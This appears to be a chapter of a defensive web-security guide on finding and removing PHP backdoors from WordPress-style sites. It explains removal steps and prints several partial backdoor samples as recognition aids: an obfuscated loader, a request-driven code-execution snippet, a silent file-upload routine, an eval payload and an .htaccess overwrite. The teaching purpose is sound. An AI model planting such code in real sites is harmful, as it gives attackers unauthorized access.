3.2: Finding and Removing Backdoors

What is a backdoor?

A malicious backdoor is code that allows unauthorized and often unrestricted access to a compromised site. They allow attackers access to all of the files within the hosting account. Backdoors can look like normal php code or obfuscated (intentionally obscured to make code ambiguous) and hidden. A backdoor can be inserted into a valid file as only one short line of code that looks rather innocent. Or, a backdoor can be a standalone file. Backdoor access allows an attacker to place any malicious code on the site. Backdoors are often found in conjunction with other malware.

Determining if your site is infected

Backdoors can be difficult to find as they are often obfuscated code. Usually if there is one backdoor, there are others that may or may not look the same. Sometimes backdoors are unsecured maintenance scripts accidentally left behind after authorized site maintenance.

A site owner is often unaware that backdoors exist on the site, however, if any other malware is found on the site, is probable that many backdoor files or code injections also exist, allowing for an attacker to gain entry to the site.

Finding and Removing Backdoors

Removal of backdoors requires an analysis of the site code. Backdoors are typically found within php files on the web server. They can either be inserted into your core, plugin, or theme files, or they can be a standalone file. They can be found in any publicly accessible directory on your server that can be easily accessed by the person who placed it.

To remove the backdoor, first create a backup of site files and database. It is helpful to review your raw http access log files, as backdoor usage is typically done through a POST HTTP request to a file.

A compromised administrative account can allow the attacker to use the core theme editor to add a backdoor to a theme’s 404 file. In this way, every request to your site that generates a 404 error message serves up a backdoor that can be used by anyone who knows that it is there.

Removal of the backdoor requires finding the code that allows for unauthorized access and removing that code. It requires an understanding of the code that operates your site.

Rogue File Backdoors

Here are some samples of backdoors found as rogue files, or files that are not part of the core plugin, theme, or content management system. They have names that seem innocent or similar to other core files such as xml.php, media.php, plugin.php, etc. and they can be placed anywhere on the site. Code in a rogue file might start like these:

$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<=DqV@&(BjX'~|ge%p+oMJv^);\"k9";$GLOBALS['ofmhl60'] = ${$t43[20].$t43

It is important to not only look for extraneous files on your site, but to examine every file.

Backdoor Plugins and Themes

If an administrative account is compromised, attackers often use the plugin or theme upload capabilities of a site to add backdoors.

If a plugin is added with backdoors, it may or may not appear on your plugin administration page. Malicious plugin files are often hidden from view and are only visible in the file system through your file manager or FTP. They are often named things that seem helpful, such as:

• WordPress Support
• Login Wall
• WP zipp
• WP-Base-SEO

Plugins may be installed that look like normal plugins, named something like Akismet3 along with some older valid Akismet files but with backdoor code contained within the uploaded files.

Theme files may also be added containing backdoors. The WordPress Sketch theme was for a time a popular malware-laden theme uploaded with numerous backdoor files within it. The theme might show up in the theme administration page, or it may be missing some files and listed at the bottom of that page as an inactive theme because it is missing some files.

If you have themes or plugins that you do not recognize, remove them. But you will also need to review the rest of your files. Often one backdoor is a means to add more backdoors throughout the site, including editing core files to add backdoor functionality within them.

Core File Backdoor Inserts

Core files of your Content Management System can have backdoors inserted into them. They can be added to the beginning of the file, the end of the file, and in some instances interspersed within valid code of the core file itself.

This code, or code like it, is often added to the top of a valid page.

if (isset($_REQUEST['FILE'])){
$_FILE =$_REQUEST['92422e6d']('$_',$_REQUEST['FILE'].'($_);');
$_FILE(stripslashes($_REQUEST['HOST']));
}

Here is another example.

@ini_set('display_errors','off'); 
@ini_set('log_errors',0); 
@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0); 
ignore_user_abort(true); 
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000'); 
$size=$_POST['size']; 
$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name']; 
$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp); 

Other backdoors are highly obfuscated and may start like this.

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\

Often there will be references to FilesMan somewhere within the backdoor file.

$default_action = "FilesMan";

Sometimes a backdoor specifically writes malicious content to a specific file, in this case, redirects to the .htaccess file.

$htaccess = str_replace( "#####​INCLUDE​#####", $ht2_code, $ht1_code );
@unlink( "[site path]/​public_html/​.htaccess" );
$fp = fopen( "[site path]/​public_html/​.htaccess", "w" );
fputs( $fp, $htaccess );
fclose( $fp );
@chmod( "[site path]/​public_html/​.htaccess", $chmod );
touch( "[site path]/​public_html/​.htaccess", $time );

Unsecured Maintenance Scripts

Maintenance scripts are sometimes left behind after maintenance is performed. These scripts are later discovered by attackers and exploited. One popular maintenance script is searchreplacedb2.php that allows unrestricted access to the site database.

Looking Beyond the Backdoor

Backdoors are most often used as a means to an end in conjunction with other malicious pages. If you have backdoors, you most likely have other malware on your site such as spam pages, spam links, phishing operations or malicious redirects.

No matter what type of backdoor you have found on your site, the big question is: how did it get there? There may be other types of malware or security vulnerabilities on your site that allowed an attacker to gain access to the site. Attackers often place multiple backdoors, some similar, some different, so a review of the entire site is important.

If after reading this guide, you are unsure of how to remove backdoors, if you are uncertain if you have removed all of them, or are looking for more answers as to how the code was placed on your site, get help.